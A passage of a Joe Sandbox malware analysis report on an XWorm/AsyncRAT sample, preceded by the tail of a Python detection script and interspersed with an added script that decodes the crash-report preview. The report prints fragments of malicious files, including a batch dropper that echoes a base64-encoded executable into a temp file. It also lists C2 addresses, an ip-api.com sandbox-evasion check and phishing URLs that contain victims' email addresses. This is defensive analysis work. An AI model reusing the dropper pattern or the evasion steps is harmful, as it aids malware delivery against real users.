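            alerts.append({"kind": "geo_check_then_c2", "severity": "critical",
                           "src": ev["src"], "dst": ev["dst"], "ts": ev["ts"],
                           "geo_check_ts": seen})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG):
        print(f"{alert['severity']:8} {alert['kind']:20} {alert['src']} -> {alert['dst']}")
```

In the constructed log, 10.0.0.5 reproduces the report's sequence and gets the critical alert; 10.0.0.9 reaches the C2 IP an hour after its lookup, so it is flagged for the C2 contact but not chained unless the window is widened; the hosting lookup alone never pages anyone.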
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1504726
                      Start date and time:2024-09-05 11:14:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Critical Process Termination
                      Sample name:x.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@13/12@2/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 7
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:15:11 | API Interceptor | 1526312x Sleep call for process: x.exe modified
11:15:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | UpdateMe.exe | malicious | Unknown | ip-api.com/json/
208.95.112.1 | Windows Security.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | xclient.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | XClient.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 25QpgTIExG.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | 7ITEwXm2Pk.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | hXpZpdaEVk.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | BrowserUpdater.exe | malicious | Unknown | ip-api.com/json/
208.95.112.1 | raplica#U00e7#U00e3odecota#U00e7#U00e3o.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | po89654.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
147.185.221.17 | cougif6lqM.exe | malicious | DCRat, XWorm |
147.185.221.17 | FUDE.bin.exe | malicious | XWorm |
147.185.221.17 | system47.exe | malicious | XWorm |
147.185.221.17 | setup.exe | malicious | XWorm |
147.185.221.17 | APPoKkkk8h.exe | malicious | Unknown |
147.185.221.17 | hatabat.exe | malicious | Blank Grabber, DCRat, XWorm |
147.185.221.17 | file.exe | malicious | Stealerium, SugarDump, XWorm |
147.185.221.17 | system.bat | malicious | XWorm |
147.185.221.17 | cheeto.exe | malicious | XWorm |
147.185.221.17 | loader.exe | malicious | Binder HackTool, XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | UpdateMe.exe | malicious | Unknown | 208.95.112.1
ip-api.com | Windows Security.exe | malicious | XWorm | 208.95.112.1
ip-api.com | xclient.exe | malicious | XWorm | 208.95.112.1
ip-api.com | XClient.exe | malicious | XWorm | 208.95.112.1
ip-api.com | http://readabilityscore.com | malicious | Unknown | 51.77.64.70
ip-api.com | 25QpgTIExG.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | 7ITEwXm2Pk.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | hXpZpdaEVk.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | BrowserUpdater.exe | malicious | Unknown | 208.95.112.1
ip-api.com | raplica#U00e7#U00e3odecota#U00e7#U00e3o.exe | malicious | AgentTesla | 208.95.112.1
bg.microsoft.map.fastly.net | https://app.edu.buncee.com/buncee/67041126b8c5429abf86de62d6aaa0d9 | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://rf-190.squarespace.com/sharepoint?e=ben.ly@wic.vic.gov.au | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | https://email.dependent.best/maintenance.html?book=py.kim@hdel.co.kr | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | RANGLANDLAW.xlsx | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://anoopmp9645.github.io/netflix.clone | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | http://warinice.ac.th/h/d/3dsece.php | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://pub-ca22a10ffb7349aca30da700c49a0d87.r2.dev/index.html | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://url.au.m.mimecastprotect.com/s/g8u6CYWLwNc3rOroI9iVCx094p | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://pub-33cba1b1aa61453b9e89a582d09f5287.r2.dev/index.html | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://pub-5f55dcf46e2c4e018b4bf54f43757e34.r2.dev/index.html | malicious | Unknown | 199.232.210.172
character-acquisitions.gl.at.ply.gg | cheeto.exe | malicious | XWorm | 147.185.221.17
character-acquisitions.gl.at.ply.gg | loader.exe | malicious | Binder HackTool, XWorm | 147.185.221.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SALSGIVERUS | silverclient.exe | malicious | Unknown | 147.185.221.22
SALSGIVERUS | XClient.exe | malicious | XWorm | 147.185.221.20
SALSGIVERUS | JFhDGHXmW6.exe | malicious | Unknown | 147.185.221.21
SALSGIVERUS | Stub.exe | malicious | Unknown | 147.185.221.22
SALSGIVERUS | N7bEDDO8u6.exe | malicious | Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm | 147.185.221.21
SALSGIVERUS | N7bEDDO8u6.exe | malicious | Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm | 147.185.221.21
SALSGIVERUS | stub (5).bat | malicious | Unknown | 147.185.221.19
SALSGIVERUS | MicrosoftEdgeWebview2.exe | malicious | XWorm | 147.185.221.20
SALSGIVERUS | abomr3e.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.bat | malicious | Unknown | 147.185.221.21
TUT-ASUS | UpdateMe.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | Windows Security.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | xclient.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | XClient.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | http://readabilityscore.com | malicious | Unknown | 208.95.112.2
TUT-ASUS | 25QpgTIExG.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | 7ITEwXm2Pk.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | hXpZpdaEVk.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | BrowserRecovery.exe | malicious | ZTrat | 208.95.112.1
TUT-ASUS | BrowserUpdater.exe | malicious | Unknown | 208.95.112.1
                                          No context
                                          No context
                                          Process:C:\Users\user\AppData\Local\Temp\x.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):210432
                                          Entropy (8bit):5.829643716053016
                                          Encrypted:false
                                          SSDEEP:3072:prm4sOjb48smI2WjbeYpX6Ou7atBBZ4uzDSEG2dCBVDtM5:pLsDbDpXKkZ4mSB2dCju
                                          MD5:74D8F5A1E068A454FFAA5C8FD32A3E44
                                          SHA1:46599D94EDC83E67E6BDE3579F61028E2BEE7096
                                          SHA-256:59B203FCF387BFDE09A17D954C9281F5743B0D0EDB9C8D1FC481EB0165416FD0
                                          SHA-512:6D5E8AEB8A5139F31B0F8ED55655C0EB52B3E2589CF1E6EE3C13B06394CEBA72DA0DC5E01972386BD75B01D17C16E00D50FE2C1E3A2C4B2A5A6B70B0A753EC3D
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Hoodbyunlock.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Hoodbyunlock.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Hoodbyunlock.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 74%
                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.....................(......~*... ...@....@.. ....................................@.................................$*..W....@..^$........................................................................... ............... ..H............text........ ...................... ..`.rsrc...^$...@...&..................@..@.reloc...............4..............@..B................`*......H.......t^..........&.....................................................(....*.r...p*. .s..*..(....*.r%..p*. .:..*.s.........s.........s.........s.........*.rI..p*. ....*.rm..p*. .8F.*.r...p*. m.`.*.r...p*. .p.*.r...p*. S...*..((...*.r...p*. .b..*.r3..p*. r...*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(H...*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(*...~....-.(\...(N...~....o\...&.-.*.r-..p*. *p{.*.rQ..p*. ~.H.*.r...p*. MX%.*.r...p*. .x!.*.r...p*. E/..*.r...p*. 4.R.*.rO.
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.4129133871120187
                                          Encrypted:false
                                          SSDEEP:384:wSrcDE81ihag8iFxcgzuiF5Y4lO8/fa7:zaE81ihacagzuiF5Y4lO8
                                          MD5:43F79019875610F9223926F94D748B63
                                          SHA1:9E7CF39A450AF22F86E6002E48E1746EF1A32E2B
                                          SHA-256:A7F499B33B9CF9A2BFD48B41C7844A4DE9A9B70D94F94FA95021C07D640D0101
                                          SHA-512:3419761938B0D6FA6DFD4940AD1531EB7147C4F7D1630E358C47710C80F89EBCE620073143E228C5FF1047F6BAA0C951A427056FB0610CAD523C5AB18A98B141
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.0.0.1.3.9.6.2.9.8.5.7.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.0.d.4.d.8.3.-.e.f.c.1.-.4.7.3.c.-.8.8.0.5.-.0.5.9.5.f.3.7.0.c.c.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.1.6.e.a.6.-.0.4.e.e.-.4.e.c.a.-.9.8.1.f.-.2.5.7.2.a.7.2.c.9.e.8.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.x...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.b.0.-.0.0.0.1.-.0.0.1.4.-.3.c.2.a.-.4.6.1.9.7.4.f.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.7.9.a.8.f.f.c.9.e.d.6.0.6.6.2.f.e.3.2.5.c.e.0.5.6.d.8.2.3.f.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.6.5.9.9.d.9.4.e.d.c.8.3.e.6.7.e.6.b.d.e.3.5.7.9.f.6.1.0.2.8.e.2.b.e.e.7.0.9.6.!.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.3././.1.5.:.2.3.:.3.2.:.3.0.!.0.!.x...e.x.e.....B.o.o.
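The Report.wer preview above is the sandbox's rendering of a UTF-16LE file with every non-printable byte shown as a dot, which is why each character is followed by one. Decoding it ties the crash to the sample: the EventType is CriticalProcessFault2 (consistent with the "Critical Process Termination" stop reason listed earlier), OriginalFilename is Hoodbyunlock.exe, and TargetAppId carries a SHA-1 that can be checked against the dropped-file table. The script below is an added example, not part of the report; the preview excerpt is copied from this page with several records omitted, while the rendering rule and the TargetAppId layout are assumptions stated in the code comments.

```python
"""Turn the dotted Report.wer preview back into key/value records and
check the SHA-1 embedded in TargetAppId against the dropped file's hash.
"""
import re

# Excerpt of the Report.wer preview from this report (records omitted).
WER_PREVIEW = (
    "..V.e.r.s.i.o.n.=.1....."
    "E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2....."
    "E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.0.0.1.3.9.6.2.9.8.5.7.9.6....."
    "R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1....."
    "N.s.A.p.p.N.a.m.e.=.x...e.x.e....."
    "O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e....."
    "T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.7.9.a.8.f.f.c.9.e.d.6.0.6.6.2.f.e.3.2.5.c.e."
    "0.5.6.d.8.2.3.f.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.6.5.9.9.d.9.4.e.d.c.8.3.e.6.7.e.6.b."
    "d.e.3.5.7.9.f.6.1.0.2.8.e.2.b.e.e.7.0.9.6.!.x...e.x.e....."
    "B.o.o."
)

# SHA-1 of C:\ProgramData\Hoodbyunlock.exe from the dropped-file table.
DROPPED_SHA1 = "46599D94EDC83E67E6BDE3579F61028E2BEE7096"

HEX40 = re.compile(r"^[0-9a-f]{40}$")


def parse_wer_preview(preview: str) -> dict:
    """Decode the dotted preview into {key: value}.

    Assumption about the report's rendering: the UTF-16LE BOM, the 0x00
    high bytes, CR and LF are all drawn as '.', so real characters sit at
    every second position after the two-dot BOM, a CRLF collapses to two
    adjacent dots, and a literal '.' in a value (x.exe) survives as one dot.
    """
    if not preview.startswith(".."):
        raise ValueError("expected the two-dot BOM placeholder at the start")
    chars = preview[2:][0::2]          # drop the BOM, keep every low byte
    fields = {}
    for record in chars.split(".."):   # CR LF became two adjacent dots
        key, sep, value = record.partition("=")
        if sep:                        # skip the truncated tail ("Boo")
            fields[key] = value
    return fields


def crashed_image_sha1(fields: dict):
    """Extract the image hash from TargetAppId.

    Assumption (observed in this report): TargetAppId has the form
    W:<app id>!0000<sha1 of the faulting image>!<image name>, so the
    middle segment's last 40 hex characters are the SHA-1.
    """
    parts = fields.get("TargetAppId", "").split("!")
    if len(parts) < 3:
        return None
    candidate = parts[1][-40:].lower()
    return candidate if HEX40.match(candidate) else None


if __name__ == "__main__":
    fields = parse_wer_preview(WER_PREVIEW)
    for key in ("EventType", "NsAppName", "OriginalFilename"):
        print(f"{key}: {fields[key]}")
    sha1 = crashed_image_sha1(fields)
    print("faulting image SHA-1:", sha1,
          "(matches dropped file)" if sha1 == DROPPED_SHA1.lower() else "(no match)")
```

The same decoding works for the WERInternalMetadata.xml preview further down, whose dots follow the same rule; only the record splitting changes, since XML has no CRLF-separated key/value lines.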
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:Mini DuMP crash report, 16 streams, Thu Sep 5 09:16:37 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):625456
                                          Entropy (8bit):3.0868940562293776
                                          Encrypted:false
                                          SSDEEP:3072:58DAij8lb7tbc9YyaiDcSL8Ce1CCqp8m33+vQHRPW5GZRYFCxDP//bKLW4gRffh:5Rij8N7tYXX6qp8U3QQxesnpH2LWzxp
                                          MD5:F49FD3D222A0EEBFFB3469740CCF7EF8
                                          SHA1:2760C14B01921ED7A92C86CF9773CC55DAFBDE18
                                          SHA-256:95A0D5EAC722A31B9394DE41DD8B7DBCA191494254FA84CCC29BB6F55076D36D
                                          SHA-512:311908A56311998A19E7D9600B6A11F7EBBDD175571F26989621DC58D47BBEEF203275A7807417E27E67B1CFD278EF0D3A5607D1D4361DC2B328D021E7AA8332
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... ........v.f.........................(..........<....3......<....3.......P..............l.......8...........T...........pY...1...........J...........K..............................................................................eJ.......L......Lw......................T............v.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):7216
                                          Entropy (8bit):3.72147725888785
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJcnZnAYk4j74t8Lpr589bwE3ifBQm:R6lXJcZnAYk24tBwkifj
                                          MD5:1574F6119083FE39D7112807F10ADB1D
                                          SHA1:9D5DC0656069A7822542E4EE126794700A5769FA
                                          SHA-256:C832EB2B3A5B7D8FADC025D7072A1E1F14DC65D7A889551DC93D36A30FC091F0
                                          SHA-512:DE55B3D49BF43464B30B97D5169235D970FA301D207FDC3F68F140860B78B7403BF9651600298C60639C24B603CA81BF4C1170F5D56D3F94FB7B705A62039022
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.0.8.<./.P.i.
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4885
                                          Entropy (8bit):4.444670667654476
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsVJg771I9UXWpW8VYbYm8M4JpSFvyayq8vR3Z5NktM2d:uIjfvI7jm7V/JvaWNitM2d
                                          MD5:453B31D7F59EAF1D49670DB4FC05E76C
                                          SHA1:91D530B6AD754811B09E00135B96DE08F8F06A4A
                                          SHA-256:DCE0BB8AB7DF90CB97AF8AFA3FE14E0B129C8B8F0CAF7E2EFD838CC87667DB3C
                                          SHA-512:3BF05D963CDBF3F996DCDE21A63F7D3B1D9EC76DE14C26556F2FF6580AED0BC8A77BABF8B3DA09D63D0EF11CBE5F197D442AD02481AE0FD92A361CA75493985C
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="486739" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Users\user\Desktop\x.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):425
                                          Entropy (8bit):5.357964438493834
                                          Encrypted:false
                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                          MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                          SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                          SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                          SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                          Process:C:\Users\user\Desktop\x.exe
                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):345261
                                          Entropy (8bit):5.555493592376344
                                          Encrypted:false
                                          SSDEEP:6144:QO9RfQQb7q7TqZnbOLYILURiZulrrQ5dxStevxP593o04M3Bwv3+XEKGVs7Pd08Q:QOjQ2q7TqpbOLYILURiZulrrQ5dxSte+
                                          MD5:CCAEA73653A34AF5DD4FE25C5C1832BC
                                          SHA1:BCB90167312BC189AEDBAD3EFE09579B0F5204A1
                                          SHA-256:62A64C90FC235FAE4BB96FF0CE6E4A890A1F6BAFEE5EDCABBAD4E1F1AB587C8E
                                          SHA-512:229F43E706926B182D8F7ED2469D30D6D024B749516CEF67C79F4F30B54E04BC8DD3AB410389397246F0B031CD3AF06F8DD5B667CA77931736CF6DA8B4E7D8C0
                                          Malicious:true
                                          Preview:@echo off && title my men..@Echo off..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>%tmp%\x..echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g>>%tmp%\x..echo aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAI7a9GUAAAAAAAAAAOAAAgELAQsAAA>>%tmp%\x..echo wBAAAoAgAAAAAAfioBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACg>>%tmp%\x..echo AwAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACQqAQBXAA>>%tmp%\x..echo AAAEABAF4kAgAAAAAAAAAAAAAAAAAAAAAAAIADAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%tmp%\x..echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAA>>%tmp%\x..echo AAAAAAAAAAAC50ZXh0AAAAhAoBAAAgAAAADAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy>>%tmp%\x..echo YwAAAF4kAgAAQAEAACYCAAAOAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIADAA>>%tmp%\x..echo ACAAAANAMAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABgKgEAAAAAAEgAAAAC>>%tmp%\x..echo AAUAdF4AALDLAAABAAAAJgAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%tmp%\x..echo AAAAAAAAAAAA
                                          Process:C:\Windows\System32\cmd.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):36864
                                          Entropy (8bit):4.7194566221075025
                                          Encrypted:false
                                          SSDEEP:768:bnqg2lK/b7YYeXegN56SIcaUC+BKqWLlCXXGjbLWWeNkiT6boP:bqNlwgNzINn+BKqwlCX2jfWWeNTP
                                          MD5:ACC558CEC5DB1188A689D6ECEF9E841E
                                          SHA1:DD2B5D0A530EDAF96FF96C14E01EF6E62B512EE1
                                          SHA-256:00806F2ABB2FC94683BBB1DF8E73CD9DB93967C55949E1F3B57DE9F7ED9B54B2
                                          SHA-512:7FC97132803DF1262B97DEF20D19AC92B4A79DC34E7E8C4D5DAEE87EF3CEEE2F63AF04BD734E668AE74CD13AE60B0D3BC417094D3864BE5B39FB905D9ED55F42
                                          Malicious:true
                                          Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g..aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAI7a9GUAAAAAAAAAAOAAAgELAQsAAA..wBAAAoAgAAAAAAfioBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACg..AwAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACQqAQBXAA..AAAEABAF4kAgAAAAAAAAAAAAAAAAAAAAAAAIADAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAA..AAAAAAAAAAAC50ZXh0AAAAhAoBAAAgAAAADAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy..YwAAAF4kAgAAQAEAACYCAAAOAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIADAA..ACAAAANAMAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABgKgEAAAAAAEgAAAAC..AAUAdF4AALDLAAABAAAAJgAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAB4CKBgAAAoqGnIBAABwKhogrnOvAioeAigZAAAKKhpyJQAAcCoa..IM063wMqpnMaAAAKgAEAAARzGwAACoACAAAEcxwAAAqAAwAABHMdAAAKgAQAAAQqGnJJAA..BwKhogE/UeBCoacm0AAHAqGiCwOEYDKhpykQAAcCoaIG3UYAIqGnK1AABwKhogIB
